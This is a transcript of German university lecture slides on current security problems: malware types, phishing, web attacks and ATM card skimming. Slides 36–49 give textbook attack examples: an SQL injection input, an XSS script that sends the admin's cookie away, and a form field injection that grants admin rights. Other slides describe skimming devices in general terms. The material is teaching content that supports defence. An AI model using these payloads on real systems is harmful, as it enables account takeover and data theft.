Aktuelle Beispiele für Sicherheitsprobleme. Omio Horo, Büsra Coskuner

Transkript

1 Aktuelle Beispiele für Sicherheitsprobleme Omio Horo, Büsra Coskuner

2 Agenda Ein Blick in den Posteingang Allgemeine Attacken - Beispiele Spezielle Attacken - Beispiele Schutzmaßnahmen 2

3 Agenda Ein Blick in den Posteingang Allgemeine Attacken - Beispiele Spezielle Attacken - Beispiele Schutzmaßnahmen 3

4 Ein Blick in den Posteingang Malware Viren Würmer Trojanische Pferde Hoaxes Phishing 4

5 Ein Blick in den Posteingang Malware Malware malicious software: schädliche bzw. böswillige Programme Computerprogramme, die vom Benutzer unerwünschte und ggf. schädliche Funktionen ausführen. Schließt ein Viren, Würmer, Trojanische Pferde, Adware, Spyware usw. 5

6 Ein Blick in den Posteingang Viren C I A!!! Viren Nisten sich in Computer ein und breiten sich innerhalb dieser aus Übertragung auf andere Wirte erfolgt passiv durch den Benutzer Modifizieren die infizierten Dateien Bei Ausführung des ursprünglichen Programms wird tatsächlich der Virus aktiviert. 6

7 Ein Blick in den Posteingang Würmer C I A!!! Würmer Breiten sich nicht innerhalb der infizierten Computer aus Übertragen sich aktiv über ein Netzwerk meistens das Internet auf andere Computer Bereits vorhandene Dateien werden nicht infiziert Sinn: so viele Rechner wie möglich befallen 7

8 Ein Blick in den Posteingang Würmer Einige bekannte Würmer: MyDoom: Bekannt seit: Januar 2004 Schaden: Backdoor Netsky: Bekannt seit: März 2004 Schaden: Massenmailing Sasser: Bekannt seit: Mai 2004 Schaden: Systemabstürze, verminderte Systemleistung 8

9 Ein Blick in den Posteingang Trojanische Pferde C I A!!! Trojanische Pferde Programm, das mehr als das von ihm Erwartete oder von ihm Erwartetes falsch oder nicht tut (Pfitzmann) oder Computerprogramm, das als nützliche Anwendung getarnt ist, im Hintergrund aber ohne Wissen des Anwenders eine andere Funktion erfüllt. Verbreiten sich nicht selbstständig Werden manchmal gezielt, manchmal zufällig eingeschleust Dienen u.a. dazu, Passwörter auszuspähen oder den gesamten Rechner zu zerstören. 9

10 Ein Blick in den Posteingang Trojanische Pferde Beispiele für Schadensfunktionen von trojanischen Pferden Backdoor: Teil eines Computerprogramms, der es Benutzern ermöglicht, unter Umgehung der normalen Zugriffssicherung Zugang zum Computer oder einem Computerprogramm zu erlangen und den Computer/ das Programm zu steuern. Keylogger: Hard- oder Software, die dazu verwendet wird, die Eingaben des Benutzers an einem Computer mitzuprotokollieren und dadurch zu überwachen oder zu rekonstruieren, um an vertrauliche Daten etwa Kennworte oder PIN zu gelangen. 10

11 Ein Blick in den Posteingang Trojanische Pferde Beispiele für Schadensfunktionen von trojanischen Pferden Dropper: installiert unbemerkt Malware auf ein System Sniffer: Überwachung des Datenverkehrs oder aller Benutzeraktivitäten Dialer: heimliche Einwahl auf Telefon- Mehrwertrufnummern Trojaner müssen nicht unbedingt Schadensfunktionen erfüllen! 11

12 Ein Blick in den Posteingang Hoaxes C I A!! Hoaxes Seriös wirkende Warnungen vor Malware (Schädliche Programme) via Aufforderung der Empfänger, weiterzuleiten Haben keinen ernst zu nehmenden Hintergrund Weiter leiten führt nur zur Belastung des Internets aufgrund nutzlosen Datenverkehrs 12

13 Ein Blick in den Posteingang Phishing C I A!!! Phishing "Abfischen" vertraulicher Daten i.d.r. über s, die scheinbar von seriösen Firmen stammen Aufforderung des Empfängers unbedingt eine bestimmte Web-Adresse anzusteuern und dort dann seine vertraulichen Daten einzugeben Betrüger benutzen Internetadressen, die sich nur geringfügig von denen der renommierten Firmen unterscheiden. Oder sie fälschen die Adressleiste des Browsers mit einem Java-Skript. 13

14 Agenda Ein Blick in den Posteingang Allgemeine Attacken - Beispiele Spezielle Attacken - Beispiele Schutzmaßnahmen 14

15 Allgemeine Attacken Malware-Attacken Security im Internet Motivation der Angreifer Faktor Mensch 15

16 Malware-Attacken 16

17 17

18 18

19 19

20 20

21 Allgemeine Attacken Malware-Attacken Würmer Diese hübsche Dame ist ein Skype-Virus , 21

22 Allgemeine Attacken Malware-Attacken Würmer Diese hübsche Dame ist ein Skype-Virus , Ein Chat-Fenster öffnet sich mit dem obigen Bild im Miniformat. Ein Klick auf das Bild: Bild öffnet sich, der Rechner wird mit dem Wurm Mal/Pykse-A infiziert. Kontakte erhalten ebenfalls dieses Minibild mit dem Wurm. Wurm versucht sich mit einigen Webseiten zu verbinden, wahrscheinlich um die Anzahl ihrer Klicks zu erhöhen. 22

23 Allgemeine Attacken Malware-Attacken Trojanische Pferde Medienfeind: Trojaner killt MP3s und Videos , 23

24 Allgemeine Attacken Malware-Attacken Trojanische Pferde Medienfeind: Trojaner killt MP3s und Videos , Name des Trojaners: MediaDel-A Löscht MP3-, WAV-, AVI- und MPG-Dateien vom befallenen System Gelöschte Daten werden ersetzt durch eine Textnachricht: you should not steal our hard work. thanks for understanding why we did this. RIAA/MPAA. Wahrscheinlich soll der Ruf der US Musikindustrie geschädigt werden. 24

25 Allgemeine Attacken Malware-Attacken Trojanische Pferde Falsche Ebay-Mails: ein geschenkter Gaul , 25

26 Allgemeine Attacken Malware-Attacken Trojanische Pferde Falsche Ebay-Mails: ein geschenkter Gaul , Vorgeblich von Ebay kommende Mails versprechen den Empfängern ein Geschenk. Betreff: "Das spezielle Geschenk zum Kauf." Aufforderung, einem bestimmten Link zu folgen. vorgetäuschte Fehlermeldung ("Server Error"), im Hintergrund ein Script, der den zum ermittelten Browser passenden Exploit-Code anwendet, um einen Downloader einzuschleusen. Lädt Backdoor und Keylogger herunter. 26

27 Allgemeine Attacken Malware-Attacken Phishing: 27

28 Allgemeine Attacken Malware-Attacken Phishing: Webseite 28

29 Allgemeine Attacken Malware-Attacken Trend Microsoft: Sprunghafter Anstieg der Angriffe auf persönliche Daten , 29

30 Allgemeine Attacken Malware-Attacken Trend Microsoft: Sprunghafter Anstieg der Angriffe auf persönliche Daten , In der ersten Jahreshälfte 2007: 500% mehr Schädlinge als in den sechs Monaten zuvor hätten versucht, an persönliche Informationen von Anwendern zu kommen. Angriffsversuche durch Trojaner, Keylogger und Spionageprogramme Zwei der von Microsoft entdeckten Trojanerfamilien hätten es gezielt auf Bankinformationen abgesehen. 30

31 Allgemeine Attacken Malware-Attacken Trend Trojanische Pferde weiter auf dem Vormarsch , 31

32 Allgemeine Attacken Malware-Attacken Trend Trojanische Pferde weiter auf dem Vormarsch , Zahl der neu entdeckten Trojanischen Pferde steigt an, die der Würmer und Viren sinkt Anteil neu entdeckter Schädlinge im 2. Quartal 2007: Trojanische Pferde 83%, Würmer 8%, Adware 5%, Spyware 2% 32

33 Internet-Attacken 33

34 34

35 Allgemeine Attacken Security im Internet SQL-Injection Was man wohl da oben alles eingeben kann? 35

36 Allgemeine Attacken Security im Internet C I A!!! SQL-Injection Angreifer kann SQL-Statements ausführen Schwachstelle: Formfelder/ Webformular Beispiel: User gibt ein: OR 1 -- Applicationcode zum Auswerten der .find(:all, :conditions => ownwer_id=123 AND subject= # { } generiertes SQL: select * from s where owner_id=123 AND subject = OR

37 Allgemeine Attacken Security im Internet SQL-Injection OR 1 ist immer TRUE Alles nach - - ist ein Kommentar Folge: Es können ziemlich viele SQL Statements abgesetzt werden. 37

38 Allgemeine Attacken Security im Internet C I A!!! CSS/ XSS (Cross Site Scripting) Idee: Cookie klauen Cookie speichert u.a. den Status des Users (Ein-/ Ausgeloggt) Cookie-Protokoll unterstützt rudimentäre Sicherheit (Nur Website, die Cookie erstellt, darf diesen auch lesen) Mit Java-Script kann man ihn trotzdem lesen. 38

39 Allgemeine Attacken Security im Internet CSS/ XSS (Cross Site Scripting) Beispiel: Angreifer besucht Shopping-Website. In das Hilfe- Formularfeld für Administratoren gibt er Java-Scriptcode ein: <script> document.location= +document.co okie </script> Admin sieht sich irgendwann die Hilfemeldung im Browser an. Im Browser ist zu lesen: <div class= user_comment > <%=user_comment%> </div> Gleichzeitig wird das Java-Script ausgeführt. Folge: Angreifer ist als Systemadministrator eingeloggt. 39

40 Allgemeine Attacken Security im Internet Aktuell Zehntausende Kunden von Kreditkartendiebstahl betroffen , 40

41 Allgemeine Attacken Security im Internet Aktuell Zehntausende Kunden von Kreditkartendiebstahl betroffen , Sehr wahrscheinlich XSS-Attacke Administratoren sollen auch Zugriff auf Abrechnungssystem gehabt haben, welches Kreditkarteninformationen enthält. 41

42 Allgemeine Attacken Security im Internet C I A!! ID-Parameters Man kauft online ein und begutachtet den Warenkorb In der Browserzeile steht... Was passiert wohl, wenn man etwas anderes eintippt? Folge: Durch URL-Manipulationen verschafft man sich unerlaubte Einblicke. 42

43 Allgemeine Attacken Security im Internet Aktuell Erneute Datenpanne bei ebay , 43

44 Allgemeine Attacken Security im Internet Aktuell Erneute Datenpanne bei ebay , Newsletter wurde verschickt, mit personlisiertem Link Link lässt sich manipulieren, so dass man ebay- Usernamen und Real-Namen von wildfremden Personen erhält. 44

45 Allgemeine Attacken Security im Internet C I A!!! Direkter Datenbankeintrag Was der User sieht 45

46 Allgemeine Attacken Security im Internet Direkter Datenbankeintrag Wie das HTML im Browser aussieht 46

47 Allgemeine Attacken Security im Internet Direkter Datenbankeintrag <form method="post action=" <input type="text" name="user[name]" /> <input type="text" name="user[password]" /> </form> 47

48 Allgemeine Attacken Security im Internet Direkter Datenbankeintrag Was unsere Applikation an Feldern hat: create_table:users column: name,:string column: password,:string column: role,:string,:default=> user column: approved,:integer,:default=>0 48

49 Allgemeine Attacken Security im Internet Direkter Datenbankeintrag <form method="post" action=" <input type="text" name="user[name]" /> <input type="text" name="user[password]" /> <input type="text" name="user[role]" value="admin" /> <input type="text" name="user[approved]" value="1" /> </form> 49

50 Allgemeine Attacken Security im Internet Direkter Datenbankeintrag User hat sich als Administrator angemeldet und freigeschaltet. 50

51 Allgemeine Attacken Security im Internet C I A!!! File Uploads Sehr beliebt: Bilder Applikation prüft nur (kann auch nur prüfen), ob die Dateiendung valide ist (jpg, bmp, png, gif, ) Folge: Bildinformationen wie z.b. Beschreibungen, Erstellungsdatum, Kommentare etc. können potentiell böswilligen Code enthalten. Diese können bei Anzeigen des Bildes ausgeführt werden. 51

52 Allgemeine Attacken Security im Internet C I A! Logfiles Speichert ALLES! Ist meistens sogar den Administratoren nicht bewusst, was alles gespeichert wird. Z.B. Kreditkarteninformationen 52

53 Motivation der Angreifer 53

54 Allgemeine Attacken Motivation der Angreifer Früher: Das System bezwingen und dessen Grenzen testen Programme an die Grenzen ihrer Leistungsfähigkeit bringen Neugier, Freude an der Herausforderung $ Ruhm, Anerkennung, Prestige $$ Einige bekannte ehemalige Hacker: Steve Wozniak (Gründer Apple Computer Company) Bill Gates (Gründer Microsoft Corporation) Linus Torvalds (Entwickler Linux) $$$ $ 54

55 Allgemeine Attacken Motivation der Angreifer Heute überwiegend: Kriminelle Motive Machtgelüste, Rache, Böswilligkeit Monetäre Ziele: abfangen von Banking-Daten Geld verdienen durch spezielle Aufträge Natürlich auch Neugier, Langeweile, sich Beweisen $ $$ $$$ $ 55

56 Allgemeine Attacken Motivation der Angreifer Geldquelle: Malware Cybercrime: Der Markt boomt , 56

57 Allgemeine Attacken Motivation der Angreifer Geldquelle: Malware Cybercrime: Der Markt boomt , Zu kaufen: u.a. Malware, Spam und DDos-Attacken Oft: Kombination aus Spam-Kampagne und DDoS-Attacke u.a. Versand von 20 Mio. Spam- s: 350 DDoS-Attacke: 20 pro Stunde Trojaner: $ für Exploits zu noch unbekannten Sicherheitslücken, mehrere zehntausend Euro für speziell angefertigte Trojaner 57

58 58

59 Allgemeine Attacken Motivation der Angreifer Quelltextausschnitte: MyDoom.U/V: We searching 4 work in AV industry. I-love-you Virus: I hate go to school 59

60 Allgemeine Attacken Motivation der Angreifer Quelltextausschnitte Kleinkrieg Netsky vs. MyDoom & Bagle? NetSky.C: "we are the skynet - you can't hide yourself! - we kill malware writers (they have no chance!) - [LaMeRz- ->] MyDoom.F is a thief of our idea! - -< SkyNet AV vs. Malware". Bagle.I: "Hey, NetSky, fuck off you bitch, don't ruine our business, wanna start a war?" MyDoom.F (über Netsky): "your shitty app" 60

61 Faktor Mensch 61

62 Allgemeine Attacken Faktor Mensch Beitrag des Benutzers am Umlauf von Malware Offensichtliche Viren im Anhang, die nicht geöffnet werden sollten Verweise auf Links in dubiosen s Malware, deren Installation bestätigt werden muss Passwörter sind frei zugänglich z.b. auf Klebezetteln vermerkt Passwörter zu einfach Neugier, Unkenntnis, Unbedachtheit 62

63 Agenda Ein Blick in den Posteingang Allgemeine Attacken - Beispiele Spezielle Attacken Beispiele Schutzmaßnahmen 63

64 Spezielle Attacken W-LAN, Navigationsgeräte Handy EC-Karte, Online-Banking 64

65 W-LAN, Navigationsgeräte 65

66 Spezielle Attacken W-LAN, Navigationsgeräte C I A!!! W-LAN Unendlich viele Verschlüsselungsmöglichkeiten (WEP, DES, ) Bei Auslieferung per Default off Kein PC-Neuling weiß, wie er Verschlüsselung einschaltet. Folge: Verschlüsselungsmöglichkeiten werden nicht genutzt. Lösung: seit etwa einem Jahr ist bei Auslieferung eines neuen Rechners die W-LAN-Verschlüsselung eingeschaltet. 66

67 Spezielle Attacken W-LAN, Navigationsgeräte C I A!! Navigationsgeräte Hat Kartenmaterial, aber kann auch Codes empfangen (TMC) Location Code, Event Code Codes werden über Radiosignale übermittelt. Angreifer stellt sich auf eine bestimmte Position und wartet auf vorbei fahrendes Auto. Gefälschte Eventcodes wie z.b. Staumeldungen werden im Navigationsgerät des vorbei fahrenden Autos angezeigt. 67

68 Handy 68

69 Spezielle Attacken Handy C I A!!! Handy-Würmer: Erste Handy-Würmer seit Mitte 2004 im Umlauf Verbreitung über Bluetooth Bekannter Wurm zu Testzwecken: Cabir Cabir erfordert allerdings die explizite Erlaubnis und mehrmalige Bestätigung zur Installation Betroffene Geräte u.a. Nokia 76xx, 6xxx, 36xx, N-Gage; Panasonic X700, Siemens SX-1, Sendo X Richtet keinen Schaden an, verringert Akku-Laufzeit, weil er ständig aktive Bluetooth-Geräte sucht. 69

70 Spezielle Attacken Handy Falschmeldungen und Hoaxes: Kettenbrief warnt vor Handy-Virus, das sich an Telefonbucheinträge verbreitet, die mit ICE beginnen Angeblicher Dialer in der geknackte Raubkopie des Spiels "Mosquitos Warnung vor der Anzeigen ACE-? und UNAVAILABLE auf dem Display 70

71 Spezielle Attacken Handy Abhören von Handys Hacker machen Handys zu Wanzen , 71

72 Spezielle Attacken Handy Abhören von Handys Hacker machen Handys zu Wanzen , Service-SMS wird vom Handy akzeptiert und führt einen Programmcode aus Problem sei Lücke in den Protokollen der Service-SMS Service-SMS dienen dazu, Software-Updates auf die Telefonkarte oder das Handy zu übertragen, ohne dass der Kunde etwas merkt. Handy empfängt Service-SMS mit bestimmten Code. Folge: Gespräche werden mitgehört, SMS gelesen, Adressbücher kopiert usw. Nach eigenen Angaben im Dezember 2006 arbeite das FBI bereits mit dieser Methode 72

73 EC-Karte, Online-Banking 73

74 Spezielle Attacken EC-Karte, Online-Banking C I A!!! Kopieren der EC-Karte: eine Möglichkeit Befestigung eines Lesegeräts an Eingabeschlitz kopiert Magnetstreifen Befestigung einer kleinen Kamera an die Lichtleiste oder an den Prospekthalter zeichnet die PIN-Eingabe auf oder Befestigung einer zweiten Tastatur auf originale Tastatur speichert die eingegebene PIN-Nummer Daten des Magnetstreifens auf andere Magnetstreifenkarte aufbringen Mit gefälschter EC-Karte und dem PIN im Ausland Geld abheben 74

75 Spezielle Attacken EC-Karte, Online-Banking Vorher Nachher 75

76 Spezielle Attacken EC-Karte, Online-Banking Vorher Nachher 76

77 Spezielle Attacken EC-Karte, Online-Banking Tastatur aus der Nähe 77

78 Spezielle Attacken EC-Karte, Online-Banking Vorher Nachher 78

79 Spezielle Attacken EC-Karte, Online-Banking Vorher Nachher 79

80 Spezielle Attacken EC-Karte, Online-Banking Vorher Nachher 80

81 Spezielle Attacken EC-Karte, Online-Banking Vorher Nachher 81

82 Spezielle Attacken EC-Karte, Online-Banking Weitere Karteneinschübe 82

83 Spezielle Attacken EC-Karte, Online-Banking Präparierte Lichtleiste 83

84 Spezielle Attacken EC-Karte, Online-Banking Dubletten 84

85 Spezielle Attacken EC-Karte, Online-Banking Weitere interessante Bilder unter 85

86 Spezielle Attacken EC-Karte Einige Berichte EC-Karte und PIN - Ausspähen im Handel , Betrug mit EC-Karten , Sicherheitsrisiko EC - warum weder PIN noch Unterschrift schützen , Neuer Kartentrick , 86

87 Spezielle Attacken EC-Karte, Online-Banking C I A!! Online-Banking Zusätzlich zur PIN gibt es eine TAN, welche zeitlich befristet ist. Grundsätzlich treten jedoch beim Online-Banking eher Phishing und unfreiwillig installierte Keylogger-Attacken auf. 87

88 Agenda Ein Blick in den Posteingang Allgemeine Attacken - Beispiele Spezielle Attacken Beispiele Schutzmaßnahmen 88

89 Schutzmaßnahmen Eure Vorschläge! 89

90 90

91 Vielen Dank! 91

92 Quellen